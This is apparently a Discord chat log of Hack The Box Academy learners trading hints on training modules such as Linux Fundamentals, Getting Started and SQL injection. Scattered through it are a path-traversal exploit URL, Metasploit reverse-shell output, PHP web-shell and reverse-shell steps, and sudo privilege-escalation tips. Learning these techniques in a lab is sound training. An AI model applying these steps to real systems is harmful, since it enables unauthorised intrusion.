You will need a VPN if you don't want to use the browser based PwnBox on the modules.
yeah thats what i meant i think
i wanna make my own VM on my computer
and use that to do the modules, if thats possible
The modules are ALREADY in a VM....I guess I don't understand why you want it virtualized twice?
A VM would be good if you're going to install Parrot OS or Kali Linux for the Pen Testing tools.
Since you're new, I'd stick to using their PwnBox with everything already built in and it has the "reset" feature.
ok im confused
but like, i don't wanna use the ready made VM that is in there because its laggy on the browser
but yeah i might understand the whole thing wrong idk
hey guys
I am on the Linux Fundamentals module on the System Information section and whenever I try to ssh to htb-student with the given ip every thing just disappears I can still write but I can't use any commands. Is this a bug or can someone explain me what I am doing wrong not to happen this again in the future, please?
@thorny crow does it make any sense what im saying?
like not wanting to use the VM box that is on the browser in the modules
wanting to use my own client version
Yes. Feel free to lookup Kali Linux or Parrot OS and install guides on YouTube.
look into vmware or virtual box
then look for how to set up parrot on them
👍 but do i need a VPN for those to connect to these module things, or no?
yes
so i need to buy like NordVPN or something?
for the vm you need a vpn. for the browser you dont need the vpn
theres a vpn key that you download on each module i think
and i think you just load it into openvpn
openvpn is a free vpn client
its opensource and comes with no ovpn configs
you would download the ovpn config from the module and load it into openvpn
though i havent done that yet. ive been using the browser and dealing with the lag
yeah so if i download client VM and install parrot on it, i need VPN
ive been seeing some people say they have more problem with the vpn though and they needed to turn off the vpn for the target ip to work so thats why i stick with the browser instance
yeah
openvpn
i wouldnt use your own vpn
htb vpn config for openvpn should have extra security
the htb open vpn config is found in each section near the target ip. its a button that says "get a vpn key"
you first download openvpn client, then download the key from the "get a key button"
no its just a client
yes
whats the diff of like NordVPN and OpenVPN
nord is a client and a vpn service that you pay monthly for
but they both do the same thing or no?
why would you pay for VPN service if u get VPN for free
i think the htb key that you load into openvpn will have more security to keep out hackers
the htb key is just for htb . it probably blocks sites that are not related to htb
nord will let you use any site
My knowledge on VPN's is so limited
i dont understand XD
So does HTB host this OpenVPN or something?
or how is it free?
the htb vpn will only be used for hack the box modules
open vpn connects to htb servers only
nord connects to nords servers and unblocks all websites
and one purpose of a vpn is to hide your real ip so you cant be attacked by hackers
also vpns would have their own security set up so will protect you a bit more if you dont know how to secure your own network
So is VPN like a virtual router or something
a vpn is a virtual private network. youre connecting to another network for protection. its like a shield from the internet. though you need to be careful what vpns you trust because the vpn company can see your internet traffic.
Ok, but what does a VPN service provider get paid for? Whats their like thing where they put money so that they can make money
They have hardware that support alot of people connecting to their network? or something
it comes down to who do you trust more, your isp to see your traffic or the vpn provider to see your traffic. or the random hackers seeing your real ip and gaining access to your home network.
hey all im working on the getting started module and im on the public exploits page and trying to complete the challenge at the bottom, but I cant even ping the target machine. im trying to ping from the box htb gives us, no luck
Yeah but like. Do the VPN providers get their VPN service out of air? They pay nothing to make millions?
What is the resource they have, that enables them to have this VPN service, that makes them money
are you a reporter or something? why does it matter?
I think they just have a lot of servers all over the world usually
@atomic light Because i'm trying to understand how it works
they pay money to build their own servers in different countries
i guess i need to check some youtube guide or something on VPNs
you can make your own vpn server on a computer that has fast internet. then you can connect many computers to that computer from anywhere in the world
but the vpn providers have a lot of clients so they build super computers in data centers with super fast gigabit internet. gigabit internet is not cheap
and the computers break and need to be replaced
the vpn providers set up extra security to protect you from hackers. thats why you pay them. some vpns are faster than others. some vpns are capped at 50mbps
other more expensive vpns cap out at 1gbps
the vpn providers have to pay for gigabit internet so you can surf the internet with their vpn
Ahh i understand, thanks!
anybody here solved the getting started | Public exploits using searchsploit?
I cannot find what the path to the htb-student's mail is. This is btw Linux Fundamentals
check File System Hierarchy it'll give you an idea where to check for email
you mean with cat /etc/passwd? or something else
btw i'm very new to linux
something else its just asking you what dir the email is in if you go check the File system hierarchy> 1st page of the module
||*/var||
i tried that one
its incomplete
send you a dm what I tried
How can I help?
what have you tried so far?
so some say there is a way to get the flag.txt with just searchsploit, i got the flag using metasploit, just wondering how was it done by searchsploit just doing by one simple command in the browser
My flags arent working for the web requests module. i've tried using my VM originally i thought i was because of burp suite reloading caused the target to get reset but now im not the docker and it still wont accept my flag
the flag is identical.
Hi all! Been a bit stuck on the Getting Started > Public Exploits exercise. Would someone be able to point me in the right direction?
|| - I found the exploit here: https://www.exploit-db.com/exploits/39883
- I'm assuming it's the file download vulnerability we're dealing with
- Trying to download the flag file using this link structure mentioned in the exploit: http://[ip]:[port]/wp-admin/tools.php?page=backup_manager&download_backup_file=../flag.txt
- File is blank, what am I missing here?
[edit] Someone helped out, I was going down the wrong path. Make sure you're using metasploit! ||
Thanks!
Help! Stuck at getting started module knowledge check. I was able to get user flag, but now I can't reverse shell anymore. I keep getting this with metasploit:
"[*] Started reverse TCP handler on 10.10.14.187:4444
[*] 10.129.231.55:80 - Authenticating...
[+] 10.129.231.55:80 - The authentication process is done successfully!
[*] 10.129.231.55:80 - Extracting Cookies Information...
[*] 10.129.231.55:80 - Uploading payload...
[-] 10.129.231.55:80 - Exploit aborted due to failure: unknown: 10.129.231.55:80 - Upload failed
[*] Exploit completed, but no session was created."
It worked and then it stopped working. I tried rebooting, changing vpn, changing target...!
What helped me with that was going back in the pentesting basics section and double check so I don't forget anything.
Nobody knows how to help me? If u do please ping me.
what section exactly in the module?
POST
Why is it that for the website of Knowledge Check I can login as admin, but when I use the same credentials for metasploit it fails?
Check back the "Nibbles - Web Footprinting" section
What do you mean by it fails?
I'm stuck with metasploit too. It used to work and now it just fails to upload.
huh
Can somebody help me please?
It's asking me what non-standard application is running under the current user?
I've tried get-process and the task manager and still can't seem to find the single application they are asking for
try ps aux to list all current running processes. look for all the processes running under that user. maybe you will see something that sticks out
I am sorry I should have specified I am in the windows fundamentals module
Get-Process -IncludeUserName see if you can do the same with that
Im stuck at Getting Started > knowledge check at root, i found NOPASSWD folder but i still cant sudo or open it
Thanks I got it...the answer was right in my face the whole time
hey guys, i need help in the skills assessment part for Javascript obfuscation
the question is = As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable.
i think i already got the flag but it says its wrong
Haha well I asked you where you're at, you explained it to me, and then realized you had the answer already
hello im on SQL INJECTION FUNDAMENTALS > Skills Assessment - SQL Injection Fundamentals
i was able to upload a php shell but when i try to do ||"ls /"|| it doesnt show anything but ||"ls"|| works
Help pls
They're different for each target
HI all I'm stuck on the intro to web apps - HTML injection. I can change the text but I can't seem to link the website. Am I missing something obvious?
I'm stuck at the fundamentals of Linux and someone helped me. But even with the right command the site says it's wrong. Any ideas?
It almost seems like the OS is updated, but the answer on the site isn't.
Linux Fundamentals
Where in particular? 😮
System Information page
Hi, i'm stuck in JAVASCRIPT DEOBFUSCATION / Skills assessments, question 2. Even with the hint i don't really understand the flag format expected. I tried a lot of combinations but still don't work (i feel idiot on this since it's the only one answer i can't find in this skills assessments) [SOLVED]
Question : How many files exist on the system that have the ".bak" extension?
Topic : Find Files and Directories
(Linux Fundamentals)
Hey @quiet forum to prevent any spoilers, shall I give you a nudge in a dm?
noted 😜
Hi! I have been stuck on this question for a while "How many files exist on the system that have the ".bak" extension?".
I have tried numerous different ways to search, and gotten numerous results, however, none seem to be correct. I would really appreciate it if someone could give me a push in the right direction. I have mainly been trying to use xxxxxxxxxxxxxxxxxxxxxxxxxx Xxxxxxxxxxxxxxxxxxxxxxxxxx
i have even tried finding every file on the entire system, and restricting it with `xxxxxxxx`
dude spoilerssss
Anyone here that can help with SQL injection fundamentals? The authentication to the mysql database seems to not be working. Seems like someone else was asking about this 3 days ago as well, but I couldn't find an answer.
The command I'm using is as follows "mysql -u root -h <ip> -P <port> -p", but it gives the error message "ERROR 2002 (HY000): Can't connect to MySQL server on '206.189.121.131' (115)"
I have tried restarting my workstation and target, but nothing seems to help.
Man this fundamentals networking module is HEAVY. The addressing portion blows right over my head. Anyone know like video resource or something that helps explain this?
Would someone be able to tell me if what I did to answer one of the Linux questions was the best way to go? I don't want to say too much and give any spoilers.
sure thing, dm me
hey Casper, shoot me a dm
guys in the knowledge check module of getting started , ||i made a reverse shell using metasploit ||but i can't find user_flag anywhere ... some advice?
Hi im stuck on the last section of the SQL INJECTION FUNDAMENTALS MODULE
I have to find a flag in the / root directory
I was able to upload a php shell file to be able to run commands.
It works when I do commands like "ls" or "pwd", but when I try "ls" with a different path it wont work, like "ls /" or "ls .."
What did you mean by it was talking about the stack in the theory section? In theory, wouldn't EBP be the base of the stack, and thus be 0 (relative to the frame)? This question is so confusing, because EBP changes throughout the execution of the code (at least as far as I understand). I have no idea what it is asking for.
Is there any way to hack vr. Gűey
Hi
any pointers on the reverse shell? I connected via metasploit but haven't figured out the reverse shell yet.
I stumbled my way through the sub netting with the help of this one. https://www.youtube.com/watch?v=POPoAjWFkGg&t=421s
GETTING STARTED
Page 23
Knowledge Check
im stuck here
in metasploit i specified the username and password and remote host and target uri
metasploit says its successful but failed to give me a shell
Maybe I'm wrong but I think that if you are connecting via Metasploit, you are actually using a reverse shell
If I'm wrong, it doesn't matter because you are doing the right thing anyway
i think im putting in the wrong target uri
but i cant find the file upload button on the admin panel
so yeah I think you're right. I guess I am more after "upgrading the shell" I can only run limited commands via the metasploit connection. Sounds like we're stuck at the same spot pretty much.
i also think im supposed to specify the path to the plugin for target uri but i dont know what the path is
did you get the first flag? or is that what you're trying to do now?
i havent gotten any flags yet
You can actually find the first flag, you can navigate using the CD and ls command
im trying to exploit the file upload
Think of that as a normal folder where you need to go deeper using the CD command
there are 2 exploits for the plugin if you search in metasploit. the first one for rce does not work. but the second one for file upload works but fails to give me a shell
yeah I got the first one... i am trying to escalate my privileges now to find the root flag
sent you DM
k
I'm stuck at the same place on knowledge check. The metasploit script just fail I tried different payload, but nothing. I got it working once and have the first flag, but I can't get a reverse shell anymore.
you still there? I'm stuck there too. I'm trying to debug with burpsuite, but I don't get why it worked once...!!
i got a meterpreter session
@tidal mango Thanks i'll check that out!
i had to reset the target ip
and i used the rce exploit
the target uri must stay as default too
i dont know how to use meterpreter though
you can type help for meterpreter commands or change the payload in metasploit for a regular shell.
i typed shell in meterpreter and is says it was created but doesnt give me a shell
I get "Exploit completed, but no session was created." with the RCE script.
that happened to me too until i refreshed the target ip in the section and specified the new ip for rhost
you also need to specify lhost
yeah tried different target all night long yesterday xD
you only need to set rhost and lhost. dont set anything else
yup nothing. I set lhost as tun0 or (manually enter my vpn ip) and rhost as the target ip. It worked once yesterday, then nothing.
pm me what plugin exploit you are using
crypto
also im using the pwnbox in a browser, not my own vm
Module: Getting Started
Page: Knowledge Check
Question: Can exploit the target but if I try the "shell" command in meterpreter I get no response. So what do I have to do?
yeah me too
i found this but i dont know how to use them
I've done numerous tutorials in Null Byte demonstrating the power of Metasploit's meterpreter. With the meterpreter on the target system, you have nearly total command of the victim. As a result, several of you have asked me for a complete list of commands available for the meterpreter because there doesn't seem to be a complete list anywhere on...
Try set php and "tab" to see the different options and try maybe php/reverse_php maybe?
Module: Getting Started
Section: Public Exploits
Question: i cant find the targets services
like i dont know where to look
check back the service scanning section then
no like, i get that, but i see 2 different services running for the web app
let me check it out again
and neither work for my exploit
when you find the login info and log in, at the bottom of the page will say the plugin and version
where would i find that?
you have to use gobuster to find all the directories as explained in one of the sections
then you explore the files in each directory
ahhhhh, gotcha, forgot about gobuster
hehehe!
that's the right approach. But there is something that server runs that is even more obvious.
i saw nginx too
gotcha
something even more obvious! 😉
any hint? ive been stuck on this for an hour lmao
have you gone on the website?
the main admin page you start on after logged in says it at the bottom of the page
powered by
you found any exploit? What are you using to search them?
use searchsploit
can someone give me a bit of a walkthrough?
how do i use the exploits on searchsploit
There I used basic bash commands to read the file it refers to.
not used to bash too much? You should check out their linux module and the cheat sheet. The trick here is that the path it refers to is not an absolute path (it doesn't start from /), but relative path starting somewhere. So you need to 'locate' that file's full path so you can 'cat' it.
Same here, I just get a blinking cursor and no response back after I type shell
but do commands work?
its only a meterpreter session, its not a real shell so bash commands arent working. and only some of the meterpreter commands are working. i think the rest of the meterpreter commands will work if we can get a shell but typing shell isnt giving a shell. i also was able to upload my own shell.sh reverse tcp through meterpreter and did a chmod but when i use execute -f the shell does not run, but it says it turned it into a process. i also double checked that my reverse tcp shell.sh has my hosts ip to connect back to me and i started a listener on the same port that i set in my shell.sh and it all looks good but the shell.sh is not starting
or maybe that port is blocked
so then i tried starting a listener on port 80 on my host but the terminal is saying port 80 is in use because my meterpreter session is using port 80
have you tried another metasploit payload?
i dont know how to switch payloads. the sections didnt say how to even set a payload
Try set payload php and "tab" to see the different options and try maybe php/reverse_php. I already hinted that.
when?
after i have a meterpreter session?
no before. It's a script option, just like rhost and lhost
msf6 exploit(multi/http/---------------------) > set payload php
[-] The value specified for payload is not valid.
"tab" to see the list of possible payload.
nothing shows up with tab
oh i figured out tab
i was doing a space before i did tab
tab is a precious tool for autocompletions with bash
thanks that did it
Glad to hear!
now im trying to escalate in meteploit
i tried typing getsystem
but it didnt work
i guess now i need to create my own reverse tcp now that i have a shell. then i will try to escalate netcat
i did get the first flag though thanks to you
What's your target IP by curiosity? I still can't get any shell. I'm stuck with a bug... 😦
oh i forgot i cant post ips in here
ooh oops! Didn't know that
i pmed you
ok it's not the same Ip i had that was working yesterday
Once I connected via VPN the shell responds. When trying it from the website interface it does not
i can get a shell by changing the payload to a reverse php
i just cant escalate privileges from metasploit
you can find some interesting results with the commands in the privesc section of the cheat sheet.
i did that. it breaks my shell
oh so i guess metasploit gives me a full tty shell right away because nano works
i just need to find the right gtfo bin to escalate with
i did sudo -l but the gtfo bins on github for php arent working for me
does anyone know the proper way to use getsystem, with metasploit?
im starting to think the gtfo bins will not work at all for this one. ill try ssh ing with id_rsa
on github?
i used the webpage
i was looking at that but theres so many. i dont know a reliable method to find the exact working bin
what webpage?
this is what im looking at
that's right
but when you use the sudo -l command, you can't use the shell with sudo
you have the sudo ability on php
so you should watch the ||sudo and not the shell||
the what?
its censored
pm me
sudo -l works in my shell
but the gtfo bins do not
Is anyone online right now?
I've got a question to ask regarding the Linux fundamental module
Lenoire helped me figure out why my privilege escalation wasnt working. i finished
GETTING STARTED
Page 23
Knowledge Check
the problem was the default meterpreter shell that runs is the wrong one. the metasploit php shell is also the wrong one. the generic reverse tcp metasploit shell is the correct one.
did you get the last flag then?
yes
please help im working on File Inclusion / Directory Traversal
the question " Submit the contents of the flag.txt file located in the /usr/share/flags directory."
i tried php wrapper and getting an error that its not enabled
im not on that one yet
yeah im just a beginner so its kinda confusing
What's the question??
he solved it
ahh ok then
I got the answer eventually, but thanks for asking mate. Cheers 🍻
How do i answer this question bro?
Question : Determine what user the ProFTPd server is running under. Submit the username as the answer.
Output : htb-stu+
I've already tried "ps aux | grep 'proftpd'"
that's the right command sir, you should be able to see the answer hint: top left side
how do i find the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? (Linux fundamentals)
try ls -ltrh instead
I'm supposed to use one of these find, which, locate from the module
and ls -ltrh displays total 0
are you inside the target's machine?
ye
can i see what's the path you're trying to check
ohh i see
thanks it's more clear now so you are in the wrong path
oh
am i supposed to use find / instead then?
ok i figured it out. Thanks a bunch @scenic apex
Hello can someone tell me if I can ssh into targets using my own vm instead of the htb vm? It just keeps timing out for me
Which module and section? @short ether
ye
download the vpn key and "sudo openvpn academy.ovpn"
Thank you got it working!
Getting Started -> Privilege Escalation: Anyone able to answer a question or two for me? I'm stuck
can someone give me some hint with the "public exploit"? i have already finished all the modules but is one is strange because i don't know what to do.
i'm using metasploit with ||wp_simple_backup_file_read|| as the exploit but i can't get anything
Do it without msf
if i use searchsploit, i only find ||simple backup 2.7.11||
so not the one i should use
Try
I feel stupid, i was expecting a username like "htb-student" or something like that 😅 😂 but the answer was in plain sight and it was in the USER column too... Anyways thanks for the guide, appreciate it a lot. Cheers mate 🍻
i downloaded the 2.7.11 but how can i use the php file ?
Read it with your eyes
I'm completely stuck at WEB requests->POST method. Can anyone help? The hint says: "||Manipulate the cookie as discussed in the previous section||". Sure, i can decode it, change it and encode it, but how am i supposed to know what to change it into? Im probably missing an obvious thing here.
are you using burp to grab the cookie?
yeah
decoded it?
yeah
okay... tried changing it?
what does the cookie decode to?
something like "guest-[random code from letters and numbers]"
whoops i meant guest not admin
right... have you tried changing what is static?
have you repeated it? or looked in the source?
what is the module name and I will walkthrough it on my box?
ye, but dont think ive looked in the source tho
Hi guys, quick question on the Linux fundamentals module.
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
How do i exactly filter the result that i got from --> curl https://www.inlanefreight.com/
I know that i'll have to use the grep function
in the Web Request Post Methods section.... I am pretty sure I got to the admin panel, but the question is unclear what they want for the answer. Anyone have a pointer for me?
I think you need to play with WC as well
Hello everyone! I've got an issue. In Getting Started -> Public Exploit. When i start an instance and i would like to scan the target with nmap, I've got this error: Host seems down. If it is really up, but blocking our ping probes. Or, the target is actually start. So what can i do?
(I try restart but nothing, i don't understand why i've got this error...)
Hello I can't find how to get to /usr/share/flags/flag.txt for the 2nd question of file inclusion, I've tried a lot of different combinations with the section methods and curl or wget but no luck. Can someone give me a good hint?
did you specify the port? also try -pN
